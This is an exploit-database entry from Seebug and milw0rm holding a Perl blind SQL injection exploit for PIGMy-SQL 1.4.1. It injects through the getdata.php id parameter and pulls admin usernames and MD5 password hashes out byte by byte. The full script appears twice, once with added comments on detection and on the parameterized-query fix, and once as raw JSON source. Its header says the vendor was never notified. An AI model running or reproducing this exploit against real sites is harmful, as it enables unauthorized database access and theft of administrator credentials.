ID SSV:65297 Type seebug Reporter Root Modified 2014-07-01T00:00:00
Description
No description provided by source.
#!/usr/bin/perl
# - PIGMy-SQL <= 1.4.1 Blind SQL Injection Exploit -
# PIGMy-SQL is vulnerable because the MySQL queries are insecure, therefore it allows an attacker to execute SQL queries; since the..
# ..vulnerable page only returns a picture, we have to use a blind SQL script; here's a little one I coded below. It will be a lot faster using tools like sqlmap etc., but this does the job
#
# Discovered And Coded By: t0pP8uZz
# Discovered On: April 4 2008
# Vendor has not been notified!
# Admin login is at /admin/
# passwords are encrypted in MD5
# END OF
use strict;
use LWP::Simple;
# Interactive driver: prints the banner, reads a base URL and a photo id from
# STDIN, confirms the boolean oracle with inject_test(), then runs
# blindattack() and prints whatever it recovered.
# Neither input is validated; $url is only ever used as a prefix for
# "/getdata.php?id=..." in the two subs below, so a value with a trailing
# slash or no scheme simply produces a malformed request rather than an error.
print "--------------------------------------------------\n";
print "- PIGMy-SQL <= 1.4.1 Blind SQL Injection Exploit -\n";
print "- Coded And Discovered By t0pP8uZz -\n";
print "- -\n";
print "- This exploit will obtain the admin user/pass.. -\n";
print "- ..Using a blind sql injection attack -\n";
print "--------------------------------------------------\n";
print "\nTarget Site: ";
# Base URL of the installation (used verbatim as a prefix for /getdata.php).
chomp(my $url=<STDIN>);
print "Valid Photo ID: ";
# Presumably an id that exists, so the un-injected request returns a picture
# (the header comment says the page only returns an image) - not checked here.
chomp(my $pid=<STDIN>);
# inject_test() either returns 1 or calls exit itself, so there is no
# false branch to handle: execution only reaches past this line on success.
if(inject_test($url, $pid)) {
print "\nInjecting Please Wait.. This could take several minutes.\n";
my $result = blindattack($url, $pid);
print "Exploited! Admin Details Are: ".$result;
exit;
}
# Recovers one row of galleryusers (name, ':', pass, '^') one byte at a time
# through a boolean oracle: each request asks whether byte $substr of the
# concatenated value has ASCII code $chr, and the presence of a '#' byte in
# the response body is taken as "true" (why '#' is the oracle is not explained
# on the page; presumably a byte present in the image the page returns).
# Arguments: base URL and a photo id. Returns the recovered string without
# the trailing '^' sentinel, or undef if the very first probe hit the sentinel.
# Defender's view: every recovered byte costs one request per candidate value
# from 48 upward, all to the same path with "and ascii(substring((select ..."
# in the query string - a highly distinctive pattern in access logs. The root
# cause the page describes is that getdata.php interpolates id into the SQL
# unparameterized; validating id as an integer or binding it as a
# prepared-statement parameter removes the oracle entirely.
sub blindattack {
my $url = shift;
my $pid = shift;
my $done = 0;
# 1-based position inside the concatenated value (MySQL substring()).
my $substr = 1;
# Candidate byte value, starting at 48 ('0'); reset after each hit.
my $chr = 48;
my $res = undef;
while($done == 0) {
# NOTE(review): LWP::Simple::get() returns undef on an HTTP failure, and
# `use warnings` is absent, so a failed request silently counts as "false".
my $content = get($url."/getdata.php?id=".$pid." and ascii(substring((select concat(name,0x3a,pass,0x5E) FROM galleryusers),".$substr.",1))=".$chr."/*");
# 0x5E ('^', 94) is appended by the query as an end marker; matching it at
# the current position means the whole value has been read.
if($content =~ /#/ && $chr == 94) { $done = 1; }
elsif($content =~ /#/) { $res .= chr($chr); $substr++; $chr = 48; }
# No upper bound on $chr and no start below 48: if no candidate ever
# matches (request blocked, response changed, byte < 48), this never ends.
else { $chr++; }
}
return $res;
}
# Boolean-oracle check: requests the same photo id with an always-true and an
# always-false tail and requires that only the true variant yields a '#' byte
# in the response body.
# Arguments: base URL and a photo id. Returns 1 when the two responses differ
# in that way; otherwise prints a message and calls exit, so it never returns
# a false value to the caller.
# Defender's view: the request pair "id=N and 1=1" / "id=N and 1=2" against
# getdata.php is the first thing this script sends and is a useful detection
# signature on its own; on the application side, an integer check or a bound
# parameter for id makes both requests fail identically.
sub inject_test {
my $url = shift;
my $pid = shift;
# NOTE(review): get() returns undef on HTTP failure and `use warnings` is
# absent, so a network error here is reported as "not vulnerable".
my $true = get($url."/getdata.php?id=".$pid." and 1=1");
my $false = get($url."/getdata.php?id=".$pid." and 1=2");
if($true =~ /#/ && $false !~ /#/) {
print "\nTarget Vulnerable!";
return 1;
}
else {
print "Target not vulnerable! die'ing!";
exit;
}
}
# milw0rm.com [2008-04-04]
{"lastseen": "2017-11-19T13:34:29", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "_object_type": "robots.models.seebug.SeebugBulletin", "status": "cve,poc", "enchantments": {"score": {"vector": "NONE", "value": 7.5}, "dependencies": {"references": [], "modified": "2017-11-19T13:34:29"}, "vulnersScore": 7.5}, "href": "https://www.seebug.org/vuldb/ssvid-65297", "references": [], "history": [], "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "id": "SSV:65297", "title": "PIGMy-SQL <= 1.4.1 (getdata.php id) Blind SQL Injection Exploit", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 0, "sourceData": "\n #!/usr/bin/perl\r\n\r\n# - PIGMy-SQL <= 1.4.1 Blind SQL Injection Exploit -\r\n# PIGMy-SQL is vulnerable because the mysql querys are insecure, therefor it allows an attack to execute sql querys, since the..\r\n#\t..vulnerable page only returns a picture we have to use a blind sql script, heres a little one i coded below, it will be alot faster using things like sqlmap etc. but this does the job\r\n#\r\n# Discovered And Coded By: t0pP8uZz\r\n# Discovered On: April 4 2008\r\n# Vendor has not been notifed!\r\n# Admin login is at /admin/\r\n# passwords are encrypted in MD5\r\n# END OF\r\n\r\nuse strict;\r\nuse LWP::Simple;\r\n\r\nprint "--------------------------------------------------\\n";\r\nprint "- PIGMy-SQL <= 1.4.1 Blind SQL Injection Exploit -\\n";\r\nprint "- Coded And Discovered By t0pP8uZz -\\n";\r\nprint "- -\\n";\r\nprint "- This exploit will obtain the admin user/pass.. 
-\\n";\r\nprint "- ..Using a blind sql injection attack -\\n";\r\nprint "--------------------------------------------------\\n";\r\n\r\nprint "\\nTarget Site: ";\r\n\tchomp(my $url=<STDIN>);\r\n\t\r\nprint "Valid Photo ID: ";\r\n\tchomp(my $pid=<STDIN>);\r\n\r\nif(inject_test($url, $pid)) {\r\n\r\n\tprint "\\nInjecting Please Wait.. This could take several minutes.\\n";\r\n\tmy $result = blindattack($url, $pid);\r\n\tprint "Exploited! Admin Details Are: ".$result;\r\n\texit;\r\n}\r\n\r\nsub blindattack {\r\n\r\n\tmy $url = shift;\r\n\tmy $pid = shift;\r\n\tmy $done = 0;\r\n\tmy $substr = 1;\r\n\tmy $chr = 48;\r\n\tmy $res = undef;\r\n\t\r\n\twhile($done == 0) {\r\n\t\tmy $content = get($url."/getdata.php?id=".$pid." and ascii(substring((select concat(name,0x3a,pass,0x5E) FROM galleryusers),".$substr.",1))=".$chr."/*");\r\n\t\t\r\n\t\tif($content =~ /#/ && $chr == 94) { $done = 1; }\r\n\t\t\telsif($content =~ /#/) { $res .= chr($chr); $substr++; $chr = 48; }\r\n\t\t\t\telse { $chr++; }\r\n\t}\r\n\treturn $res;\r\n}\r\n\r\nsub inject_test {\r\n\r\n\tmy $url = shift;\r\n\tmy $pid = shift;\r\n\t\r\n\tmy $true = get($url."/getdata.php?id=".$pid." and 1=1");\r\n\tmy $false = get($url."/getdata.php?id=".$pid." and 1=2");\r\n\t\r\n\tif($true =~ /#/ && $false !~ /#/) { \r\n\t\tprint "\\nTarget Vulnerable!";\r\n\t\treturn 1;\r\n\t}\r\n\telse {\r\n\t\tprint "Target not vulnerable! die'ing!";\r\n\t\texit;\r\n\t}\r\n}\r\n\r\n# milw0rm.com [2008-04-04]\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-65297", "type": "seebug", "objectVersion": "1.4"}